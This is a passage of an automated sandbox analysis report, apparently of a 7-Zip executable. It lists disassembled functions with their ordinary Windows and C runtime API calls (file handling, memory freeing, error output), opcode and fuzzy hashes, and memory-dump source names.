Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
Instruction ID: 8b5e5d1cb6e59a5a3061157ba72fc0f89ad10846518829bbdf4ade6afb75bd95
Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
Instruction Fuzzy Hash: 0FD0A7D170074991CE109B26E4142696321B758BC8F045021DDAD07314DA2CC1058B00

Function 001D794C Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 001D795E

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
Instruction ID: 3df933fcd4c4282e7f37f8e3fdba63648daef3fff470c0ee3e6d02d29885747a
Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
Instruction Fuzzy Hash: 24D0137770994581DF355F79D45436413519B54F74F184311CDB4493E4EF3584D6C711

Function 001D8BB0 Relevance: 1.5, APIs: 1, Instructions: 8timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE ref: 001D8BB7

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
Instruction ID: aaa5e600ae99bd80d4ada1a7b1da965d10761a623eafe3683a2cbcedd9f51ccf
Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
Instruction Fuzzy Hash: 08B09230B12400C2CB0CA722D89631C13606798B21FE14429C90FD5650DD1C85E94700

Function 00203D58 Relevance: 1.3, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00203E2A

Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ErrorExceptionLastThrowmalloc
String ID:
API String ID: 2114622545-0
Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
Instruction ID: 3f338523c8163d54d3f2cab50e84c3b76f8514db6d05c45abe6558897d01546f
Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
Instruction Fuzzy Hash: A831CE32221B4286DB15DF29E584369B3A9FB88FE0F184235DF6A07796DF38C965C300

Function 001F373C Relevance: 1.3, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001F37FB

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
Instruction ID: 146137a56e5121188c7c8143b2387b63c9be6cd68f7161f6b99cd828dddbe5f0
Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
Instruction Fuzzy Hash: FD21287370424896C728EA1AB80057A7794F799BF4F245325FF7A87794EB78C942C740

Function 001F9078 Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,001F9B61), ref: 001F911C

Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ExceptionThrowmallocmemmove
String ID:
API String ID: 2847158419-0
Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
Instruction ID: 03764c7c59d393d2842b0b7a586983498c816e92a9870649e70f0aa393f69bd8
Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
Instruction Fuzzy Hash: 4F217F77201B8585DB11EF1AE81472AB3A4F784FA8F19C225DF6807394DF39C496C740

Function 001DC90C Relevance: 1.3, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 001DC995

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
Instruction ID: a726a89aaefcf5b7fd652c2b38ae6938ebe0f629c958fa96485965898829500d
Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
Instruction Fuzzy Hash: 43113A6276565397CB3C8B6CE4B0228A251F75478CBA45C37DACA87B10DB6ACC82D2C1

Function 00203EE0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 001F419C: free.MSVCRT ref: 001F41B9
Part of subcall function 001F419C: free.MSVCRT ref: 001F41C5
Part of subcall function 001F419C: free.MSVCRT ref: 001F41D1
Part of subcall function 001F419C: free.MSVCRT ref: 001F41DD
Part of subcall function 001F419C: free.MSVCRT ref: 001F41E6
Part of subcall function 001F419C: free.MSVCRT ref: 001F41EF
Part of subcall function 001F419C: free.MSVCRT ref: 001F41F8

free.MSVCRT ref: 00203F45

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
Instruction ID: 8dc80688ad54c7dfe3732482d1a2c3c430b3b91863d08242df2e005be6aff52a
Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
Instruction Fuzzy Hash: 21012973A24394CAC7219F1DC18116DBB34F759FE83289116EB4A07761E732C883C7A1

Function 001D8624 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001D86A9

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
Instruction ID: f4e625e4c61fb7829d8c879026c9bab7c64a29e8b54f6335c49b6038cbfa9de1
Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
Instruction Fuzzy Hash: 42011D7635624086E710CF15D56C36E7BB0B7E5B68F180209DBA44B3D1C77AC54ACBA4

Function 001DCB78 Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 001DCBA8

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
Instruction ID: 0ecc1c989ae1600eb9ae2d6795b01362685004a3509f675f56585a8f4f23e7d5
Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
Instruction Fuzzy Hash: B5F0E56231014987CB10DFBA9A8126821A1FB587D5F90183BEF8687701EB38CC99C764

Function 001DCB34 Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001D89D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA

GetLastError.KERNEL32 ref: 001DCB49

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
Instruction ID: 1a98cb0f0ec80085cfe5ad4f58077641573638bf70a39aa50230840d78378893
Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
Instruction Fuzzy Hash: A2D05B417A009596DB545EBD58D13740081B728795F901837DD9BCA352E618CDC9E269

Function 001D3314 Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 001D3339

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
Instruction ID: 92b9b6d9eb7a2fc0db7991f57414183d45790bbc115db54d3ea8a1f82fde8852
Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
Instruction Fuzzy Hash: 1BD05EA67506D886CA049B27D68151DA3229B98FD4708D4249F080B70ACE30CCE6CB50

Function 001D89D8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
Instruction ID: d2e7d8c4ee181793306d1208a89db2ad04dd859d3e140538c313b43044ffec6b
Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
Instruction Fuzzy Hash: 0DD0A7B360194480DB291F7EC8403341350A754B78F284311CAF44A3D0EF2489C68301

Function 001DCDF4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001DCE0D

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
Instruction ID: c81a82cc72e7bd60ad44bc3963268a212598454e74cb7f6620f3509d6669814a
Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
Instruction Fuzzy Hash: 5CC08C4178224902C90A222BAF8636C12220FEABD1E4C88219E480BB52DB6488E2C750

Non-executed Functions

Function 001DB114 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32 ref: 001DB12A
FileTimeToSystemTime.KERNEL32 ref: 001DB13E

Strings

gfff, xrefs: 001DB1D7

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: gfff
API String ID: 1748579591-1553575800
Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
Instruction ID: df8a8ad1ea774c17732788aba794100aae41e7eb98cc1b5566abc30e2f6f747c
Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
Instruction Fuzzy Hash: 22519A93B082C08BD719CB3DD846BCDBFC1E3A5758F08822ADB5687785E66DC50AC721

Function 002130CC Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 32COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 002130E7
fputs.MSVCRT ref: 00213104
fputs.MSVCRT ref: 00213114

Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4

fputs.MSVCRT ref: 00213132

Strings

] archive, xrefs: 00213125
ERROR, xrefs: 002130F7
Open , xrefs: 002130DD
WARNING, xrefs: 002130F0
: Can not open the file as [, xrefs: 0021310D

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs$free
String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
API String ID: 3873070119-2741933734
Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
Instruction ID: f85e2d66893cc0d7f5b7bc1c8c481fd08998b02b0b4b12469b9369eb09419ea5
Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
Instruction Fuzzy Hash: 03F01D75300E55A1EE11DFA6E9983A9A321BB69FD9F849022DE7E03364DF3CC549C300

Function 001DF0C8 Relevance: 11.3, APIs: 9, Instructions: 44COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001DF0FA
free.MSVCRT ref: 001DF103
free.MSVCRT ref: 001DF10C
free.MSVCRT ref: 001DF115
free.MSVCRT ref: 001DF11E
free.MSVCRT ref: 001DF127
free.MSVCRT ref: 001DF130
free.MSVCRT ref: 001DF139
free.MSVCRT ref: 001DF141

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
Instruction ID: f4c3600b2a581093f4e985c0ab5111a853831051daeac6bedb4ca78b28116002
Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
Instruction Fuzzy Hash: 3C011A636119808ACB10AE36DC911682730ABB6B98B1C8177FF2E4B755DF70D8428364

Function 00203162 Relevance: 10.0, APIs: 8, Instructions: 42COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00203174
free.MSVCRT ref: 0020317E
free.MSVCRT ref: 00203189
free.MSVCRT ref: 00203197
free.MSVCRT ref: 002031C0
free.MSVCRT ref: 002031C9
free.MSVCRT ref: 002031D7
free.MSVCRT ref: 002031E2

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
Instruction ID: bb874fbb0eb54c23694450a9c2cd2d11a6675aad7176b1cbf40d3e60180cd939
Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
Instruction Fuzzy Hash: 3EF0902225A69081CA10FF32C49562E6730FBF7F80F08A063EB6E63716CF38D406C214

Function 002030A8 Relevance: 10.0, APIs: 8, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 002030BA
free.MSVCRT ref: 002030C4
free.MSVCRT ref: 002030CF
free.MSVCRT ref: 002030DD
free.MSVCRT ref: 00203104
free.MSVCRT ref: 0020310D
free.MSVCRT ref: 0020311B
free.MSVCRT ref: 00203126

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
Instruction ID: 333c99c1a3db3880cc2c99477348d234a35b7f2b1c5c790e8df556eb58235f2e
Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
Instruction Fuzzy Hash: 98F0302225AA8081CA14FF32C4A562F6730F7E3F85F099053EB6E63712CF78D446C214

Function 001FD078 Relevance: 8.8, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001FD0AB
free.MSVCRT ref: 001FD0B8
free.MSVCRT ref: 001FD0EB
free.MSVCRT ref: 001FD0F3
free.MSVCRT ref: 001FD103
free.MSVCRT ref: 001FD10D
free.MSVCRT ref: 001FD117

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
Instruction ID: 07223e4a58da6cfe4f3c088bafaec1e49a826bae4f33254133ca658f50f4c7e2
Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
Instruction Fuzzy Hash: B311FA2320298485CA11AF35D8516692321EBA6FA8F1D8272EF7D577A9CF34D847C324

Function 00217080 Relevance: 7.6, APIs: 6, Instructions: 77COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 002170EC
free.MSVCRT ref: 002170F4
free.MSVCRT ref: 00217101
free.MSVCRT ref: 0021712E
free.MSVCRT ref: 00217136
free.MSVCRT ref: 00217143

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
Instruction ID: c5452d8138edb4d7ca86a9f1f7884ec408eec317bfe16f842e693c989d51b228
Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
Instruction Fuzzy Hash: 18215A67312B4086CB259F25D8503696370EBE5FA8F298222DF3D17798DF35C8528310

Function 002110C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 002110EB
fputs.MSVCRT ref: 00211153
LeaveCriticalSection.KERNEL32 ref: 0021118D

Strings

ERROR: , xrefs: 0021114C

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
